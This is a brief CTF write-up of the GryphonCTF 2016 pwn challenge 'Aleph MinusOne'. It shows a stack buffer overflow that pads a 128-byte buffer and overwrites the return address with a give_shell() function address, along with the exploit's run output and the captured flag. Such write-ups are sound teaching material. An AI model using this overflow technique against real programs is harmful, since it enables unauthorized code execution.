GryphonCTF_2016: Aleph MinusOne
Category: Pwn Points: 15 Description:
Do Aleph One proud. nc play.spgame.site 1346 Creator - Jeremy Heng (@amon)
Write-up
Credits to @zst123 [Manzel Seet] for helping with discovering buffer exploit length.
Now we are given a chance to do buffer overflow!
$ nc play.spgame.site 1346
Base Pointer: 0xffb83368
Address of Buffer: 0xffb832e0
Size of buffer: 128
give_shell() function: 0x804852d
Your exploit string: d
Contents of Buffer: d
Return Address: 0x8048633
We know that the give_shell()
function is at 0x804852d
. We also know that the size of the buffer is 128
, and by adding 12 bytes and appending our give_shell()
function address to overwrite the RET address, we gain shell.
$ ./script.py
0
RECV>>>Base Pointer: 0xffdba9b8
RECV>>>Address of Buffer: 0xffdba930
Size of buffer: 128
give_shell() function: 0x804852d
Your exploit string:
['08', '04', '85', '2d']
RECV>>>Contents of Buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-?
RECV>>>Return Address: 0x804852d
$ cat /home/alephuser/flag
RECV>>>GCTF{th3_op3n355_0f_t1m3}
Final script here.
Therefore, flag is GCTF{th3_op3n355_0f_t1m3}
.